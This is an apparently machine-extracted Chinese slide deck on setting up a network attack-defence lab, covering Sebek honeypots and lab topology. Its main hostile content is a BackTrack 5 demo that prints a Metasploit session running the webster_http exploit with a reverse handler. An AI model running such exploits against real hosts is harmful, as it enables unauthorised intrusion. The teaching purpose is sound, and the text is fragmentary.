2.1网络攻防实验环境构建汇总.pptx

2.1网络攻防实验环境构建汇总

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;Sebek工作原理一;Sebek蜜罐工作原理二;Sebek数据来源;;;;;;;;;;;;Sebek记录头;防止Sebek做为攻击工具;测试BT中的sebek;;process_tree;蜜罐主机;;;;;;;;;;;;;Back Track 5演示;msf use windows/http/webster_http msf exploit(webster_http) show options Module options (exploit/windows/http/webster_http): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Windows XP SP0 msf exploit(webster_http) set RHOST 24 RHOST = 24 msf exploit(webster_http) set RPORT 80 RPORT = 80 ;msf exploit(webster_http) show targets Exploit targets: Id Name -- ---- 0 Windows XP SP0 1 Debug msf exploit(webster_http) set target 0 target = 0;msf exploit(webster_http) set Global ====== No entries in data store. Module: windows/http/webster_http ================================= Name Value ---- ----- DOMAIN WORKSTATION DigestAuthIIS true DisablePayloadHandler false DynamicSehRecord false EnableContextEncoding false FingerprintCheck true HTTP::header_folding false HTTP::method_random_case false HTTP::method_random_invalid false HTTP::method_random_valid false HTTP::pad_fake_headers false HTTP::pad_fake_headers_count 0 HTTP::pad_get_params false;msf exploit(webster_http) exploit [*] Started reverse handler on :4444 [*] Sending request...;;;;;;;专业版网络攻防实验环境拓扑结构;;;;;;;;;;;;;;;

文档评论(0)

1亿VIP精品文档

相关文档